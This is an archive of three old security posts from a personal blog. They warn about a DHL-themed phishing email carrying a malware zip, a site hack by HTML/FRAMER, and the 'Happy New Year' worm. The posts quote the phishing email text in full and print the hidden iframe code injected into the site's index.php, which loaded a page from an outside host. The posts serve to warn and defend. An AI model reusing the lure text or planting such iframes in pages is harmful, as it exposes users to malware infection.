Archive for the 'Security' Category

DHL Print Label – MALWARE

Tuesday, October 27th, 2009

I recently received the following email:

Hello!

The courier company was not able to deliver your parcel by your address.
Cause: Error in shipping address. 

You may pickup the parcel at our post office personaly!

Please attention!
The shipping label is attached to this e-mail.
Print this label to get this package at our post office.

Please do not reply to this e-mail, it is an unmonitored mailbox.

Thank you,
DHL Global Forwarding Services.

There is a file attached DHL_print_label_cef3e.zip, do not open or run this file as it contains malware.

ThreatExpert behavioral analysis:
http://www.threatexpert.com/report.aspx?md5=8960322225b6a842bad87a285f028f5f

Anubis behavioral analysis:
http://anubis.iseclab.org/?action=result&task_id=1eddf69e4a1adce8441a785cef6c52879

See the Web of Trust (WOT) and MalwareURL reports for mmsfoundsystem .ru, a domain to which this malware phones home, and a related domain:

http://www.mywot.com/en/scorecard/mmsfoundsystem.ru
http://www.malwareurl.com/listing.php?domain=mmsfoundsystem.ru

http://www.mywot.com/en/scorecard/mmmserver.ru
http://www.malwareurl.com/listing.php?domain=mmmserver.ru

– 3Monkeys

HTML/FRAMER virus alert from AVG

Friday, July 17th, 2009

I found the HTML/FRAMER virus had infected this site. It has been eradicated!

For those interested, the following code (commented for security) was inserted into the main index (index.php) by some hacker. For those of you with WordPress blogs I suggest you check you index.php file, the malicious code is inserted at the end on index.php. Other forms of the virus encode the iframe attack.

<!– <iframe src=”http://reycross.net/lib/index.php” width=0 height=0 style=”hidden” frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=”http://reycross.net/lib/index.php” width=0 height=0 style=”hidden” frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe> –>

Alert: ‘Happy New Year’ Worm Gains Ground

Tuesday, January 2nd, 2007

Being a Linux user, I rarely have to worry about viruses, worms or spyware, though sometimes, as with the recent GMail hack, I do. Therefore, I subscribe to several computer security related RSS feeds and this one scrolled by earlier today, ‘Happy New Year’ Worm Gains Ground.

InformationWeek reports:
The “Happy New Year” worm-carrying spam that first appeared last week accounted for 12% of all e-mail traffic over the weekend and continues to spread, antivirus vendors said Tuesday.

The worm, dubbed “Tibs” by Kaspersky Lab but also known as a “Nuwar” variant (Trend Micro) and “Mixor.q” (Symantec), appears as a file attachment named “postcard.exe” in messages with “Happy New Year” subject headings. Users who launch the executable will infect their PCs with rootkits, keyloggers, and other malware.

What is particularly interesting to me is the volume of traffic this is generating. 12% translates into 1 out of every 8 emails is carrying this virus. So for those of you that have yet to make the switch to Linux, please beware and delete any email the exhibits the properties discussed in the article.

Until next time.

-3Monkeys